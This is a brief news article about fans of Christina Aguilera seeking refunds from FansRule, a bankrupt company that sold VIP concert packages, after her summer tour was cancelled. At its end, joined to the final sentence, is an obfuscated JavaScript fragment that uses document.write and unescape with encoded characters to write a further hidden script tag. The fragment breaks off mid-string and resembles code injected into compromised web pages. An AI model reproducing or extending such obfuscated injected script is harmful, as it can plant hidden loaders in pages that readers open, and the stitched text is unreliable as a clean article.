Christina Aguilera fans are crying foul with a company that's supposed to give them refunds -- and Aguilera's management is listening.
Aguilera called off her summer tour because of throat problems. Some fans had bought exclusive packages for concerts through an Aguilera-endorsed company called FansRule, which gave them better seats and a chance to meet Aguilera.
FansRule declared bankruptcy last November and doesn't have the money to give all the refunds. Azoff Music Management, which represents Aguilera, says in a statement it had expected FansRule to issue refunds by May 31st, which it has not done.
Azoff Music says it's "actively and aggressively pursuing FansRule to cause them to refund the money," but so far has not been successful.
FansRule says on its Web site it can't pay back the money yet but it is not Aguilera's fault. It says it's hoping for "a speedy resolution." Aguilera's management, meanwhile, suggests fans contact their credit card company and cancel the transaction because the intended goods were not delivered.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22